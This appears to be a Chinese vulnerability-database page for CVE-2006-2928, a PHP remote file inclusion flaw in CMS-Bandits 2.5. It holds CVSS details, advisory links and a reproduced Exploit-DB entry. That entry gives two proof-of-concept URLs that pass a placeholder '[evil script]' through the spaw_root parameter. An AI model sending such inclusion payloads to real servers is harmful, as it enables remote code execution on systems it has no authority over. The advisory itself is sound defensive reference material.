CVE-2006-2928
CVSS5.1
发布时间 :2006-06-09 06:02:00
修订时间 :2011-03-07 21:37:19
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in CMS-Bandits 2.5 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter in (1) dialogs/img.php and (2) dialogs/td.php.


[CNNVD]CMS-Bandits 多个PHP远程文件包含漏洞(CNNVD-200606-205)

        CMS-Bandits 2.5及更早版本中存在多个PHP远程文件包含漏洞,在启用register_globals时,远程攻击者可通过(1)dialogs/img.php或(2)dialogs/td.php中的spaw_root参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2928
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2928
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-205
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2211
(UNKNOWN)  VUPEN  ADV-2006-2211
http://www.securityfocus.com/archive/1/archive/1/436430/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060608 cms-bandits 2.5, Remote command execution
http://secunia.com/advisories/20507
(VENDOR_ADVISORY)  SECUNIA  20507
http://xforce.iss.net/xforce/xfdb/27001
(UNKNOWN)  XF  cmsbandits-spawroot-file-include(27001)
http://www.osvdb.org/26242
(UNKNOWN)  OSVDB  26242
http://www.osvdb.org/26241
(UNKNOWN)  OSVDB  26241
http://securityreason.com/securityalert/1068
(UNKNOWN)  SREASON  1068

- 漏洞信息

CMS-Bandits 多个PHP远程文件包含漏洞
中危 未知
2006-06-09 00:00:00 2006-06-09 00:00:00
远程  
        CMS-Bandits 2.5及更早版本中存在多个PHP远程文件包含漏洞,在启用register_globals时,远程攻击者可通过(1)dialogs/img.php或(2)dialogs/td.php中的spaw_root参数中的URL执行任意PHP代码。

- 公告与补丁

        

- 漏洞信息 (1890)

cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities (EDBID:1890)
php webapps
2006-06-08 Verified
0 Federico Fazzi
N/A [点击下载]
# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

# milw0rm.com [2006-06-08]
		

- 漏洞信息

26241
CMS-Bandits td.php spaw_root Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

CMS-Bandits contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to td.php not properly sanitizing user input supplied to the 'spaw_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-06-08 Unknow
2006-06-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站